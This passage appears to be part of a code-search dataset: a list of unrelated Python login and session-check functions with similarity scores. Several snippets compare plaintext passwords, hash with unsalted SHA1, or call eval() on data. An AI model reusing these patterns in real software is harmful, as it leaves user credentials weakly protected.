'https://console.zerodha.com/dashboard':\n cookies = self.reqsession.cookies.get_dict('console.zerodha.com')\n self.console_session = cookies['session']\n self.public_token = self.reqsession.cookies['public_token']\n return True\n else:\n raise Exception(\"Login failed or Kite session expired\")", "def _can_login(self):\n return all([self.user.is_active, self.status, self.status_detail == \"active\"])", "def test_user_login_attempt_when_user_already_logged_in(self):\n\t\tpass", "def validate(self, data):\n user_type = 3\n return validate_login_user(self, data, user_type)", "def is_logged_in(session):\n if 'tid' in session:\n return {'success': 1, 'message': '你处于登录状态.', \n 'teamname': session['teamname'], 'is_zju_user': session['is_zju_user']}\n else:\n return {\"success\": 0, \"message\": \"你并未处于登录状态.\"}", "def 
mobile(self) -> Optional[str]:\n return pulumi.get(self, \"mobile\")", "def login():\n data = request.get_json()\n email = data.get('email')\n password = data.get('pwrd')\n user = SQLModel.get_by_attrs(('email', 'pwrd'), 'users', 'email', email)\n try:\n user_pw = user[0][1]\n user_nick = user[0][0]\n if password == user_pw:\n stuff = SQLModel.get_by_attrs(('login', 'pwrdHash', 'type', 'name'), 'users', 'login', login)\n return jsonify(stuff)\n else:\n return 'fail'\n except:\n return 'fail'", "def login(uname, password, db, session):\n\tquery = db((db.User.username == uname) & (db.User.password == password))\n\tif query.count() == 1:\n\t\tsession.auth = query.select().first().id\n\t\treturn True\n\telse:\n\t\treturn False", "def validate_mobile(self, mobile):\n self.mobile = mobile.strip()\n example = \"mobile number (ex. +2346787646)\"\n if re.match(r'(^[+0-9]{1,3})*([0-9]{10,11}$)',\n self.mobile) is None:\n raise GraphQLError(\n ERROR_RESPONSES[\"invalid_field_error\"].format(example))\n return self.mobile", "def login(self, returnToURL):\r\n\t\tif not self.request().hasValue('userId') or \\\r\n\t\t\tnot self.request().hasValue('password'):\r\n\t\t\tself.response().sendRedirect('/nova/login.psp?returnToURL=%s' % returnToURL)\r\n\t\t\treturn 0\r\n\t\treturn 1", "def login(self, email, password):\n url = \"https://mbasic.facebook.com\"\n self.get(url)\n email_element = self.find_element_by_name(\"email\")\n email_element.send_keys(email)\n pass_element = self.find_element_by_name(\"pass\")\n pass_element.send_keys(password)\n pass_element.send_keys(Keys.ENTER)\n if self.find_element_by_class_name(\"bi\"):\n self.find_element_by_class_name(\"bp\").click();\n try:\n self.find_element_by_name(\"xc_message\")\n log.debug(\"Logged in\")\n return True\n except NoSuchElementException as e:\n log.error(\"Failed to login\")\n return False", "def check_login(self, resp: ResponseContextManager) -> None:\n is_login_page = '__appianCsrfToken' in resp.cookies\n if resp.ok and is_login_page:\n self.login()\n elif not resp.ok:\n # Check login page actually returns a csrf token\n login_page_resp = self.get_page('/suite/', label=\"Login.LoadUi\", check_login=False)\n if login_page_resp.ok and '__appianCsrfToken' in login_page_resp.cookies:\n self.login()", "def login_core(self, usuario_model) -> bool:\n usuario_json = eval(json.dumps(usuario_model.__dict__))\n result = self.database.select_db(name_object=\"Usuario\", filter_data=usuario_json)\n if isinstance(result, object) and result is not None:\n Constant.USUARIO = self.encrypt.decrypt(eval(result[\"usuario\"]))\n return True\n return False", "def _check(self):\n if self.browser is None:\n self._init_browser()\n\n print(\"Checking if the browser can make login\")\n\n # Test 1: Should sign in using the form, signed should be True\n signed = self._sign_in()\n print(\"Finished, [signed = {}]\".format(signed))\n\n return signed", "def is_logged(html):\n soup = BeautifulSoup(html, \"html.parser\")\n\n if soup.find('div', {'id': 'user_information'}) is None:\n return False\n return True", "def check():\n req = requests.post('https://net.tsinghua.edu.cn/do_login.php',\n {'action': 'check_online'})\n print(req.text)\n if req.text != 'not_online':\n req = requests.post('https://net.tsinghua.edu.cn/rad_user_info.php')\n info = req.text.split(',')\n traffic = int(info[6]) / 1000000000\n timelen = int(info[2]) - int(info[1])\n timelen_str = '{}:{}:{}'.format(\n timelen // 3600,\n timelen // 60 % 60,\n timelen % 60)\n info_s = 
'ip={0[8]},user={0[0]},traffic={1:.2f}GB,timelen={2}'\n info_s = info_s.format(info, traffic, timelen_str)\n print(info_s)", "def check_sc_login(text, exit_on_fail=True):\n if re.search(r'Login Required', text, re.I):\n print(\"!! Authentication Failed. Please login to System Center via your browser (%s), then try again.\" % (get_active_browser()))\n if exit_on_fail:\n sys.exit(220)\n else:\n return False\n else:\n return True", "def login(self, user_data):\n\n\t\tuser_data[\"password\"] = makeHash(user_data[\"password\"]);\n\n\t\tif self.db.request(\"getOne\", user_data):\n\t\t\treturn True;\n\t\telse:\n\t\t\treturn False;", "def login_check():\n\n user_email = request.form['email']\n user_password = request.form['password']\n\n # Check user info against database\n email_query = User.query.filter_by(email=user_email).first()\n if email_query == None:\n flash('Invalid email or password')\n return redirect('/')\n\n # Get user's id using email\n user_id = email_query.user_id\n\n # Valid user password\n if user_password == email_query.password:\n #create user session\n session['user'] = email_query.user_id\n return redirect('/user-%s' % user_id)\n else:\n flash('Invalid email or password')\n return redirect('/')", "def logged_in(self, use_page=None):\n # allow page soup to be passed as argument to make get_soup calling this function faster\n if use_page is None: soup = self.get_soup(\"overview\")\n else: soup = use_page\n\n found = soup.find(\"meta\", {\"name\": \"ogame-player-name\"})\n if found is None: return False\n if str(found[\"content\"]) == self.username: return True", "def authenticate_user(data):\n \n try:\n auth_token = data[\"auth_token\"]\n user_token = Token.objects.get(username=data[\"username\"])\n if user_token.token == auth_token:\n return True\n except:\n return False\n return False", "def default_login_works(self):\n return True if self.default_login_auth_header else False", "def login_user(username,password):\n \n check_user = Records.verify_user(username,password)\n return check_user", "def validate_login(self, username, password):\n user = User(self).get(username)\n return user and user['Password'] == password", "def check_login(db, useremail, password):\n import hashlib\n\n cursor = db.cursor().execute('SELECT password FROM users WHERE email IS ?', [useremail])\n result = cursor.fetchone()\n if result:\n return result[0] == hashlib.sha1(password.encode()).hexdigest()\n return False", "def usercheck(userip):\n if userip in session:\n return userstate.check(session[userip])\n else:\n return False", "def earthdata_login(uid=None, pwd=None, email=None, s3token=False) -> bool:\n\n try:\n url = \"urs.earthdata.nasa.gov\"\n mock_uid, _, mock_pwd = netrc.netrc(netrc).authenticators(url)\n except:\n\n mock_uid = os.environ.get(\"EARTHDATA_USERNAME\")\n mock_pwd = os.environ.get(\"EARTHDATA_PASSWORD\")\n\n if (uid == mock_uid) & (pwd == mock_pwd):\n return True\n else:\n return False", "def check_login(self, u, p):\r\n\t\tlogger.debug(\"Entering\")\r\n\t\t\r\n\t\ttry:\r\n\t\t\tval = login.validate_user(u, p)\r\n\t\texcept ValueError as e:\r\n\t\t\tlogger.debug(\"Exiting - failure\")\r\n\t\t\treturn False, e.message\r\n\t\t\r\n\t\tif val:\r\n\t\t\tlogger.debug(\"Exiting - success\")\r\n\t\t\treturn True, \"Login successful!\"\r\n\t\telse:\r\n\t\t\tlogger.debug(\"Exiting - failure\")\r\n\t\t\treturn False, \"Login failed.\"", "def details_not_matching():\n print(\"login details don't match.\")", "def login_user(self, input_email, input_password):\n logging_user_details = 
self.check_email_for_login(input_email)\n if BCRYPT.check_password_hash(logging_user_details['password'],\n input_password):\n # compare password input to saved password\n return logging_user_details\n return False", "def connectPhone(self):\n value = os.popen(self.checkPhone)\n\n for data in value.readline():\n sDate = str(data)\n if sDate.find(\"device\"):\n return True\n return False", "def valid_login(username: str, password: str):\n\n try:\n LoginHandler.login(username, password)\n global validLogin\n validLogin = True\n except:\n validLogin = False", "def login(self) -> int:\n r = self.session.post(\n self.api_endpoint,\n data={\n \"action\": \"login\",\n \"lgname\": self.user,\n \"lgpassword\": self.password,\n \"format\": \"json\",\n },\n )\n token = json.loads(r.text)[\"login\"][\"token\"]\n r = self.session.post(\n self.api_endpoint,\n data={\n \"action\": \"login\",\n \"lgname\": self.user,\n \"lgpassword\": self.password,\n \"lgtoken\": token,\n \"format\": \"json\",\n },\n )\n if json.loads(r.text)[\"login\"][\"result\"] != \"Success\":\n return -1\n return 0", "def CheckLogin(self) :\n url = Judge.UrlStatus + 'contestId=1&search=true&firstId=-1&lastId=-1&handle=' + self.username\n logging.info(\"open_url %s\" % url)\n req = urllib2.Request(url, headers=Judge.Headers)\n rsp = self.opener.open(req)\n res = None\n if rsp :\n res = rsp.read()\n #wf(\"CheckLogin_\", res)\n result = self.__parse_result(None, res, need_extra_info=False)\n if result and result.has_key('origin_runid') :\n #print \"CheckLogin last_submit_time{%s}END\" % result['_submit_time']\n self.last_runid = result['origin_runid']\n return res and res.find(r'<a href=\"/onlinejudge/login.do\">Login</a>') == -1", "def checkSession(self):\r\n\r\n app_settings = QSettings(conf_parser.get(\"APP\", \"name\"))\r\n end_date_time = app_settings.value(\"EndDateTime\", type=QDateTime)\r\n cur_date_time = QDateTime.currentDateTime()\r\n if(cur_date_time.secsTo(end_date_time) > 0):\r\n # get values from app_settings\r\n gl_content.auth_email = app_settings.value(\"Email\")\r\n gl_content.auth_user_company = app_settings.value(\"UserCompany\")\r\n gl_content.auth_first_name = app_settings.value(\"FirstName\")\r\n gl_content.auth_last_name = app_settings.value(\"LastName\")\r\n gl_content.auth_user_sys_id = app_settings.value(\"UserSysId\")\r\n gl_content.auth_password = app_settings.value(\"Password\")\r\n \r\n # decrypt password\r\n bytes_password = bytes(gl_content.auth_password)\r\n gl_content.auth_password = crypt.decrypt(bytes_password)\r\n\r\n # make login request\r\n # get mac address\r\n mac_addr = uuid.getnode()\r\n if(not mac_addr):\r\n self.accept()\r\n return\r\n \r\n # configure data\r\n data = QtCore.QByteArray()\r\n data.append(\"username={}&\".format(gl_content.auth_email))\r\n data.append(\"appVersion={}&\".format(conf_parser.get(\"APP\", \"version\")))\r\n data.append(\"appID={}&\".format(conf_parser.get(\"APP\", \"id\")))\r\n data.append(\"machineID={}&\".format(mac_addr))\r\n data.append(\"password={}\".format(gl_content.auth_password))\r\n \r\n # send request\r\n request = QtNetwork.QNetworkRequest(QtCore.QUrl(conf_parser.get(\"URLs\", \"auth\")))\r\n request.setHeader(QtNetwork.QNetworkRequest.ContentTypeHeader,'application/x-www-form-urlencoded')\r\n self.networkAccessManager.post(request, data)\r\n \r\n # start timer\r\n self.lb_msg.setText(\"Logging in to the server ...\")\r\n self.login_timer.start(200)\r\n self.pros = 0\r\n else:\r\n self.accept()", "def check_login_result(self, result):\n success_flag 
= \"成功登陆\"\n m = re.search(success_flag, result)\n if m is not None:\n print \"Login successfully!\"\n # Store the auth cooie into file\n self.mycookie.store_cookie()\n \n # Get the column\n option_flag = '<option\\svalue=\"(.*)\">(.*)</option>'\n return self.get_post_data(self.article_add_url, self.login_send_header, option_flag)\n else:\n print \"Login failed!\"\n return False", "def on_login(self, username):", "def on_login(self, username):", "def verify_password_student(mobile_or_token, password):\n\n # try with token\n student = Student.verify_auth_token(mobile_or_token)\n\n # if auth failed\n if not student:\n\n # try with mobile/password\n student = Student.query.filter_by(MOBILE=mobile_or_token).first()\n\n # if mobile not in db or in db but password doesn't match\n if not student or not student.verify_password(password):\n return False\n\n # set current user if succeeded and return success\n g.user = student\n return True", "def is_registered(self):\n if self.user == getpass.getuser():\n return True\n else:\n return False", "def logged_in():\n\n if current_user.is_authenticated:\n return True\n\n return False", "def login(self, device_name):\n try:\n device = next((item for item in self.host_dict if item.get('hostname') == device_name))\n except StopIteration:\n self.err_str = f\"Exception occurred. Please check hostname \\\"{device_name}\\\". Skipping back up\"\n backup_logger.exception(self.err_str)\n return\n backup_logger.info(f\"Logging into {device['host']}\")\n hostname = device.pop(\"hostname\")\n logged_in = False\n try:\n self.session = ConnectHandler(**device)\n if 'secret' in device:\n self.session.enable()\n self.current_device = device_name\n self.connected_devices.append(device)\n logged_in = True\n except (AuthenticationException, SSHException) as e:\n self.err_str = f\"Exception '{e}' occurred. \" \\\n f\"SSH is unsuccessful for device {hostname}. 
Skipping back up\"\n backup_logger.exception(self.err_str)\n # sys.exit()\n\n return logged_in\n # self.session = ConnectHandler(**device)", "def ismobile(number):\n if number[0] in ['7', '8', '9']:\n return True\n return False", "def do_login_login():\n print(inspect.stack()[1][3])\n print(request.form)\n query = select([User]).where(and_(User.columns.email == request.form['email'],User.columns.password==request.form['password'] ))\n ResultProxy = connection.execute(query)\n ResultSet = ResultProxy.fetchone()\n if ResultSet:\n session['logged_in'] = True\n else:\n flash('wrong password!')\n # return str(get_flashed_messages())\n return home(result)", "def check_user(used_name, used_password):\n user_exists = UserData.user_login(used_name, used_password)\n\n return user_exists", "def isLoggedIn(self):\n session = self.getSession()\n if session is not None:\n return True\n return False", "def the_browser_is_open_the_freenas_url_and_logged_in(driver, nas_ip, root_password):\n if nas_ip not in driver.current_url:\n driver.get(f\"http://{nas_ip}\")\n assert wait_on_element(driver, 10, '//input[@data-placeholder=\"Username\"]')\n if not is_element_present(driver, '//mat-list-item[@ix-auto=\"option__Dashboard\"]'):\n assert wait_on_element(driver, 10, '//input[@data-placeholder=\"Username\"]')\n driver.find_element_by_xpath('//input[@data-placeholder=\"Username\"]').clear()\n driver.find_element_by_xpath('//input[@data-placeholder=\"Username\"]').send_keys('root')\n driver.find_element_by_xpath('//input[@data-placeholder=\"Password\"]').clear()\n driver.find_element_by_xpath('//input[@data-placeholder=\"Password\"]').send_keys(root_password)\n assert wait_on_element(driver, 5, '//button[@name=\"signin_button\"]')\n driver.find_element_by_xpath('//button[@name=\"signin_button\"]').click()\n else:\n assert wait_on_element(driver, 10, '//mat-list-item[@ix-auto=\"option__Dashboard\"]', 'clickable')\n driver.find_element_by_xpath('//mat-list-item[@ix-auto=\"option__Dashboard\"]').click()", "def is_valid_login(self, username, password):\n\t\treturn self._send_command_to_entity_server(us.SERVER_COMMAND_IS_LOGIN_INFORMATION_VALID, username + '|' + password)", "def login(self,username,password):\n try:\n userNameField = self.driver.findElement(element = self.locators.lblUsernameField, elementType = \"id\", timeout = \"4\")\n if not userNameField:\n return False\n\n userNameField.click()\n userNameField.send_keys(username)\n time.sleep(self.waitShort)\n passwordField = self.driver.findElement(element = self.locators.lblPasswordField, elementType = \"id\", timeout = \"4\")\n if not passwordField:\n return False\n\n passwordField.click()\n passwordField.send_keys(password)\n time.sleep(self.waitShort)\n\n signIn = self.driver.findElement(element = self.locators.signIn, elementType = \"id\", timeout = \"4\")\n if not signIn:\n return False\n\n signIn.click()\n time.sleep(self.waitLong)\n #handler for No Thanks pop-up\n noThanks = self.driver.findElement(element = self.locators.btnNoThanks, elementType = \"id\", timeout = \"4\")\n if noThanks:\n noThanks.click()\n return True\n except Exception as exp:\n print \"Error in login(): {}\".format(exp)\n return False\n return True", "def is_logged_in(session):\n return 'user' in session" ]
[ "0.6898011", "0.689399", "0.6369667", "0.635195", "0.63429105", "0.63109106", "0.62703073", "0.6228723", "0.62186426", "0.6195903", "0.6157435", "0.61390567", "0.6046515", "0.60213834", "0.5956583", "0.59477335", "0.5935797", "0.5915573", "0.58781195", "0.58594924", "0.58545065", "0.5844821", "0.58345634", "0.5815404", "0.5740041", "0.57194996", "0.5712774", "0.56821424", "0.56702864", "0.56501263", "0.5641082", "0.5639972", "0.56349766", "0.56207985", "0.56196487", "0.56122655", "0.559915", "0.5572023", "0.5565744", "0.5559303", "0.5559303", "0.5553387", "0.55425876", "0.5535613", "0.5530373", "0.5527646", "0.5524359", "0.5519153", "0.5518919", "0.5516539", "0.5512466", "0.55121666", "0.5505517", "0.5484138", "0.5477298", "0.5476916", "0.5476521", "0.547006", "0.5469212", "0.5465067", "0.54592633", "0.54486054", "0.54400724", "0.5438683", "0.54356325", "0.5421263", "0.54169667", "0.5415251", "0.5395401", "0.53892857", "0.538205", "0.53776604", "0.53732276", "0.53697246", "0.53634596", "0.53615355", "0.5360588", "0.5354252", "0.5354074", "0.5352828", "0.5338414", "0.53364915", "0.53337073", "0.5325875", "0.53232384", "0.5321441", "0.53195566", "0.53195566", "0.5317524", "0.531629", "0.5313517", "0.5313131", "0.5308204", "0.53064245", "0.5303523", "0.5299893", "0.52995163", "0.5292093", "0.52898794", "0.5284045" ]
0.6534018
2
Check if user is admin
def require_admin(func):
    @wraps(func)
    def decorator(*args, **kwargs):
        if not g.user:
            # flash('此操作需要登录账户')
            return redirect(url_for('admin.login'))
        if g.user.name != 'admin':
            abort(403)
        return func(*args, **kwargs)
    return decorator
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def user_is_admin(user):\n return user in admins", "def is_admin(user):\n return user.is_authenticated and user.id == app.config.get('ADMIN')", "def is_admin(self, user):\n return user.name in self.admins", "def is_admin_user(self):\n if \"is_admin\" in self._properties and self.is_admin == 'YES':\n return True\n return False", "def isAdmin(user):\n return isUserType(user, Admin)", "def isAdmin():\n\tif 'username' in session and session['username'] == 'admin':\n\t\treturn True\n\telse:\n\t\treturn False", "def isAdmin(self, user):\r\n if user.id in self.admins:\r\n return True\r\n return False", "def check_admin() -> bool:\n return ctypes.windll.shell32.IsUserAnAdmin() == 1", "def is_admin(self):\n if not self.current_user:\n return False\n else:\n return self.current_user in [\"1\"]", "def admin_flag(user_id):\n user = User.query.filter_by(id=user_id).first()\n if user.is_admin:\n return True\n return False", "def check_is_admin(current_user):\n return current_user['isAdmin'] == True", "def is_user_admin(request):\n return request.user.is_superuser", "def is_admin(self,user):\n if user.is_superuser:\n return True\n\n if user.groups.filter(name=self.admin_group_name).count() > 0:\n return True\n else:\n return False", "def is_admin(ctx) -> bool:\n return db.user(ctx.author).is_admin", "def check_admin():\r\n if not current_user.is_admin:\r\n abort(403)", "def check_admin():\n if not current_user.is_admin:\n abort(403)", "def check_admin():\n if not current_user.is_admin:\n abort(403)", "def is_admin():\n user = users.get_current_user()\n if user:\n if users.is_current_user_admin() or is_local_admin():\n return 'Yes, you are admin'\n else:\n return \"No, you don't admin\"\n else:\n return \"You not logged in\"", "def check_admin():\n\tif not current_user.is_admin:\n\t\tabort(403)", "def is_admin(self):\r\n return self.admin", "def get_is_admin(self, obj):\n try:\n user = self.context.get('request').user\n except Exception:\n # raise serializers.ValidationError('Could not access request.user')\n return False\n if user == obj.admin:\n return True\n else:\n return False", "def is_admin(self):\n if self.user is None:\n return False\n if unicode(self.user._id) in self.barcamp.admins:\n return True\n if self.user.is_admin:\n return True\n return False", "def is_admin(self):\n return self.admin", "def is_user_admin(self, user):\n return user == self.created_by", "def is_current_user_admin():\n return (os.environ.get('USER_IS_ADMIN', '0')) == \"1\"", "def check_admin(self, user: TelegramController.User = None, id: str = None):\n\n if id == None:\n id = user.id\n\n return md5((str(id) + \"admin\").encode()).hexdigest() in self.__admins", "def is_admin(user):\n return user.groups.filter(name='Profesores').exists()", "def is_admin(username: str) -> bool:\n db = get_db()\n return int(db.get_user_by_name(username)[\"is_admin\"]) == 1", "def user_is_admin(userobj):\n from .node import Node\n from .subject import Subject\n from .period import Period\n from .assignment import Assignment\n return user_is_basenodeadmin(userobj, Node, Subject, Period, Assignment)", "def is_not_admin(user):\n return not user.is_superuser", "def is_admin(self) -> bool:\n return self._is_admin", "def is_admin(self, user) -> bool:\n return (\n user.is_superuser\n or user.groups.filter(pk=self.admins_group.pk).exists()\n )", "def is_admin():\n # TODO(felipemonteiro): Make this more robust via a context is admin\n # lookup.\n return CONF.patrole.rbac_test_role == CONF.identity.admin_role", "def is_admin(self):\n return 
self._is_admin", "def is_admin(self):\n return self._is_admin", "def is_admin(self, username):\n con = dbcon()\n cur = con.cursor()\n cur.execute(\"SELECT * FROM my_users WHERE username=%(username)s\",\\\n {\"username\":username})\n res = cur.fetchone()\n if res[5].lower() == 'admin':\n return True\n return False", "def is_main_admin(self):\n if self.user is None:\n return False\n return self.user.has_permission(\"admin\")", "def admin(self):\n if self.is_admin:\n return True\n return False", "def _check_admin_only(self, request):\r\n api_key = request.params.get(self.api_field, None)\r\n\r\n if request.user is None:\r\n user = self.user_fetcher(api_key=api_key)\r\n else:\r\n user = request.user\r\n\r\n if user is not None and user.is_admin:\r\n request.user = user\r\n return True", "def admin_user_exists(self):\n try:\n User.objects.get(username='admin')\n except User.DoesNotExist:\n return False\n\n return True", "def is_admin(self):\n return False", "def is_admin(user):\n return get_organisations_as_admin(user).count() > 0", "def is_admin(self, username): #WORKS\n done = self.cur.execute(\"SELECT username FROM admins WHERE username=\\\"{}\\\"\".format(username))\n if done == 0: # If query is unsuccessful, username is not an administrator.\n return False\n else:\n return True", "def is_admin():\n if platform_is(WINDOWS):\n return windll.shell32.IsUserAnAdmin()\n return os.getuid() == 0", "def is_admin(context):\n request = context[\"request\"]\n url = resolve(request.path)\n context['is_admin'] = False\n return url.app_name == 'admin'", "def is_admin(self):\n if self.type == 1:\n return True\n else:\n return False", "def is_admin(self, user):\n return (acl.action_allowed(self.request, 'OperatorDashboard', '*') or\n acl.action_allowed(self.request, 'Feed', 'Curate'))", "def check_admin(self, *args, **kwargs):\n if not users.is_current_user_admin():\n self.response.write(\n '<div style=\"padding-top: 200px; height:178px; width: 500px; color: white; margin: 0 auto; font-size: 52px; text-align: center; background: url(\\'http://3.bp.blogspot.com/_d_q1e2dFExM/TNWbWrJJ7xI/AAAAAAAAAjU/JnjBiTSA1xg/s1600/Bank+Vault.jpg\\')\">Forbidden Access <a style=\\'color: white;\\' href=\\'%s\\'>Login</a></div>' %\n users.create_login_url(self.request.path_url + self.request.query_string))\n return\n else:\n return handler(self, *args, **kwargs)", "def is_admin(self):\n if self.is_main_admin:\n return True\n if self.user is not None and self.barcamp is not None:\n if unicode(self.user._id) in self.barcamp.admins:\n return True\n return False", "def check_is_admin(context):\n init()\n\n #the target is user-self\n credentials = context.to_dict()\n target = credentials\n\n return policy.check('context_is_admin', target, credentials)", "def check_is_admin(self, wormhole: str, user: int):\n query = \"SELECT 1 FROM wormhole_admin WHERE name = ? 
AND admin = ?\"\n query_res = self.bot.db_query(query, (wormhole, user))\n return len(query_res) > 0", "async def is_admin(ctx):\n member = ctx.message.author\n aRole = discord.utils.get(member.guild.roles, name=ROLE_AD)\n if aRole in member.roles or member.id == 715048392408956950: return True", "def validate_admin(self, request):\n\n self.validate_login(request)\n\n if request.session['id'] not in self.admins:\n handler.logHelper.log_it_visit(request, __name__ + '.validate_admin', authorized=False)\n raise PermissionDenied('You need to be an admin to access this page.')", "def be_admin(username):\n user_data = my_users.get(username)\n if not user_data or 'admin' not in user_data.get('roles', []):\n return \"User does not have admin role\"", "def check_is_admin(context):\n\n init()\n # the target is user-self\n target = default_target(context)\n return _ENFORCER.authorize('context_is_admin', target, context)", "def test_is_admin_user(self):\n admin = User.objects.get(email='testadminuser@test.com')\n self.assertEqual(admin.is_staff, True)", "def is_admin(self) -> bool:\n\n return current_app.config[\"AUTH_ROLE_ADMIN\"] in [\n role.name for role in self.get_user_roles()\n ]", "def check_admin_session(self):\n for session in vms.get_vm_sessions(vm_name=self.vm_name):\n if (\n session.get_console_user()\n and\n session.get_user().get_user_name().startswith(\"admin\")\n ):\n return True\n return False", "def is_admin(self):\n return Role.query.get(2) in self.roles", "def is_admin(author):\n if str(author).lower() in config[\"admins\"]:\n return True\n return False", "def check_is_admin(context):\n init()\n credentials = context.to_policy_values()\n target = credentials\n return _ENFORCER.authorize('admin_required', target, credentials)", "def check_is_admin(cookie):\n return ';admin=true;' in cookie", "def is_administrator(self):\n return False", "async def assert_user_is_admin(auth: Auth, requester: Requester) -> None:\n is_admin = await auth.is_server_admin(requester)\n if not is_admin:\n raise AuthError(HTTPStatus.FORBIDDEN, \"You are not a server admin\")", "def isAdmin(self, nick):\n\t\tif nick in self.config[\"admins\"]:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False", "def test_func(self, user):\n return self.get_object().admin == user", "def is_user_cloud_admin(self):\n user = users.get_current_user()\n if not user:\n return False\n try:\n user_info = self.get_by_id(UserInfo, user.email())\n if user_info:\n return user_info.is_user_cloud_admin\n else:\n return False\n except Exception as err:\n logging.exception(err)\n return False", "def is_superuser(self):\n sesh = self.get_session()\n return sesh.curr_role == 'admin'", "def user_is_nodeadmin(userobj):\n from .node import Node\n return user_is_basenodeadmin(userobj, Node)", "def is_admin():\n # type: () -> bool\n current_os_name = os.name\n\n # Works with XP SP2 +\n if current_os_name == \"nt\":\n try:\n return IsUserAnAdmin()\n except Exception:\n raise EnvironmentError(\"Cannot check admin privileges\")\n elif current_os_name == \"posix\":\n # Check for root on Posix\n # os.getuid only exists on postix OSes\n # pylint: disable=E1101 (no-member)\n return os.getuid() == 0\n else:\n raise EnvironmentError(\n \"OS does not seem to be supported for admin check. 
OS: {}\".format(\n current_os_name\n )\n )", "def user_is_admin_or_superadmin(userobj):\n if userobj.is_superuser:\n return True\n else:\n return user_is_admin(userobj)", "def validateUser(self,admin):\n \n res=admin.helper.getOneUser(self.name)\n if res == False:\n return True\n else:\n return False", "def is_superuser(self):\n return self.is_admin", "def test_admin(self):\r\n \r\n self.assertEqual(False, self.user.isAdmin)", "def admin(ctx):\n return ctx.message.author.permissions_in(ctx.channel).administrator", "def admin(request):\n if not request.user.is_staff:\n return render_to_response('error.htm', {\n 'error': \"Sorry, you are not staff... (user permissions 'is_staff')\",\n })\n return render_to_response('admin.htm', {\n 'username': request.user,\n })", "def is_administrator(self):\n return self.can(Permission.ADMIN)", "def is_administrator(self):\n return self.can(Permission.ADMIN)", "def GET_adminon(self):\r\n #check like this because c.user_is_admin is still false\r\n if not c.user.name in g.admins:\r\n return self.abort404()\r\n self.login(c.user, admin = True)\r\n\r\n dest = request.referer or '/'\r\n return self.redirect(dest)", "def is_accessible(self):\n return current_user.is_authenticated and current_user.role == 'admin'", "def is_accessible(self):\n return current_user.is_authenticated and current_user.role == 'admin'", "def is_staff(self):\r\n return self.is_admin", "def admin_required(handler):\n def admin_login(self, *args, **kwargs):\n auth = self.auth\n if not auth.get_user_by_session():\n self.redirect('/auth/login', abort=True)\n \n user = auth.get_user_by_session()\n queried_entity = User.get_by_id(user['user_id'])\n \n if queried_entity and queried_entity.phb_user_admin_status == 'admin-1':\n return handler(self, *args, **kwargs)\n else:\n self.redirect('/', abort = True)\n \n return admin_login", "def is_admin(func):\n\n @wraps(func)\n def decorated_function(*args, **kwargs):\n from .base_validator import ValidationError\n user = request.user\n if user.is_admin == IsAdmin.yes:\n return func(*args, **kwargs)\n raise ValidationError(\n {'message': 'You are not authorized to access this page'},\n 403\n )\n\n return decorated_function", "def IsCorpUserOrAdmin(self):\n user_email = auth_util.GetUserEmail()\n return ((user_email and user_email.endswith('@google.com')) or\n auth_util.IsCurrentUserAdmin())", "def login_as_admin():\n users.loginAsUser(\n config.VDC_ADMIN_USER, config.VDC_ADMIN_DOMAIN,\n config.VDC_PASSWORD, filter=False\n )\n return True", "def is_administrator(self):\n return self.rol == ProfileRoles.ADMINISTRATOR or self.user.is_staff", "def user_is_assignmentadmin(userobj):\n from .assignment import Assignment\n return user_is_basenodeadmin(userobj, Assignment)", "def is_admin(self, is_admin):\n\n self._is_admin = is_admin", "def get_editable(self, user):\n return user.get('role') == 'admin'", "async def assert_requester_is_admin(auth: Auth, request: SynapseRequest) -> None:\n requester = await auth.get_user_by_req(request)\n await assert_user_is_admin(auth, requester)", "def can_edit_user(user):\n\tu = current_user._get_current_object()\n\treturn u==user or u.is_admin()", "def user_is_periodadmin(userobj):\n from .period import Period\n return user_is_basenodeadmin(userobj, Period)", "def get_is_admin():\n try:\n return ctypes.windll.shell32.IsUserAnAdmin()\n except:\n return \"Could not get the UAC level.\"", "def check_if_admin(bot, update, *args, **kwargs):\n user_id = update._effective_user\n # print(\"cerco user con id \" + str(user_id) + \", 
nel database\")\n user = DB.execute(TABELLE[\"id_users\"][\"select\"][\"from_id\"], (user_id['id'],))\n # print(\"ho trovato : \" + str(user))\n if not user:\n self.request_access(bot, user_id)\n return\n elif user[\"banned\"]:\n update.message.reply_text(\"Spiacente sei stato bannato dal bot\")\n return\n elif user[\"admin\"]:\n sig = signature(func)\n if len(sig.parameters) > 1:\n return func(bot, update, *args, **kwargs)\n else:\n return func(*args, **kwargs)\n else:\n update.message.reply_text(\"Non sei abilitato ad usare questo comando\")\n return", "def admin(request):\n if not request.user.is_staff:\n return render(request, 'manager/denied.html')\n return render(request, 'manager/index.html')", "def test_user_isnt_admin():\n app = create_ctfd()\n with app.app_context():\n register_user(app)\n client = login_as_user(app)\n for page in ['pages', 'teams', 'scoreboard', 'chals', 'statistics', 'config']:\n r = client.get('/admin/{}'.format(page))\n assert r.location.startswith(\"http://localhost/login?next=\")\n assert r.status_code == 302\n destroy_ctfd(app)", "def test_func(self):\n return self.request.user.is_superuser", "async def test_auth_admin_is_admin(app):\n # Admin user defined in MockPAMAuthenticator.\n name = 'admin'\n user = add_user(app.db, app, name=name, admin=False)\n assert user.admin is False\n cookies = await app.login_user(name)\n assert user.admin is True", "def is_staff(self):\n return self.is_admin", "def is_staff(self):\n return self.is_admin" ]
[ "0.8688236", "0.8687356", "0.8556875", "0.8554287", "0.85044616", "0.84716874", "0.8450938", "0.841185", "0.84050906", "0.8394017", "0.8363089", "0.83423585", "0.83161926", "0.8280715", "0.82797027", "0.82743096", "0.82743096", "0.8248748", "0.82192075", "0.8196186", "0.8167282", "0.81253445", "0.81230384", "0.81167454", "0.8113847", "0.8090466", "0.80842537", "0.8070545", "0.80473363", "0.80244833", "0.80222696", "0.80142", "0.7963673", "0.7962265", "0.7962265", "0.79258263", "0.7924748", "0.7910106", "0.7880401", "0.7865896", "0.7852999", "0.78060323", "0.7799159", "0.7760705", "0.7748111", "0.7722419", "0.7708694", "0.77079415", "0.7675929", "0.7661388", "0.76584923", "0.7632804", "0.7627969", "0.762729", "0.76091015", "0.7595937", "0.75892967", "0.75881845", "0.75832874", "0.7583276", "0.755741", "0.75534755", "0.7529439", "0.75187206", "0.7501087", "0.7493089", "0.74736077", "0.746824", "0.745469", "0.7451439", "0.7437464", "0.7410849", "0.74057436", "0.73977953", "0.7370247", "0.73670954", "0.7356686", "0.7356686", "0.73216", "0.7273192", 